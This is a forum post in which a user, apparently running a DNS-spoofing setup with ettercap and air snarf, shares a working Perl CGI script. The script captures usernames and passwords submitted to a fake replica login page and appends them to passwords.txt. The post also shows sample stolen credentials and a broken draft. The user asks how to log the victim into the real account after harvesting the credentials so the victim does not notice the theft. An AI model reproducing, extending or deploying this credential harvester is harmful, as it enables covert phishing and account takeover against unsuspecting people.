Okay, So Ive setup air snarf in the lab, im using ettercap to Spoof the dns, I have modified a fake replica page where the login action invokes the cgi script below, the login, is saved and all works fine, my question is instead of serving up the said, cgi page with the example message "sorry our server is down for mantainence" how would we go about using the information from stdin, to refer and log the victim into their account whilst still recording the data to passwords.txt, so instead of the stealing the victims login, and printing a suspicious sorry our servers are down message, the victims logins should be stolen but the victim should also be signed into his account, none the wiser of what just happened,

so a quick overview, the user presses login on the fake replica page, the cgi/html script is executed his info is stored to passwords.txt but he is also then logged in, without seeing any of this happen.


CURRENT CGI SCRIPT

#!perl
# chmod +x this file and stick it in your cgi-bin directory

# CHANGE THESE VARIABLES $page_title $page_message $page_image
$page_title = "BUSY SERVERS";
$page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
$page_image = "SERVER.jpg";

print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
print "<html><head><title>$page_title</title></head><body>";
print "<center>";
print "<img src=\"/$page_image\"><br><br>";
print "$page_message<br><br>\n";
print "</body></html>";


Here is an example of what password.txt looks like


url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0






this is what the script needs to something like, excuse this pathetic attempt

#!perl
# chmod +x this file and stick it in your cgi-bin directory


print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
<html>
<body>

<form method="post" action="not for forum">


<input type="hidden" name="page" value="$page">

username: <input type="text" name="login_email" value="$key" size=10><br>
password: <input type="password" name="login_password" value="$FORM" size=10><p>


<input type="submit" value="Log In">

</form>

</body>
</html>




Thanks in advanced.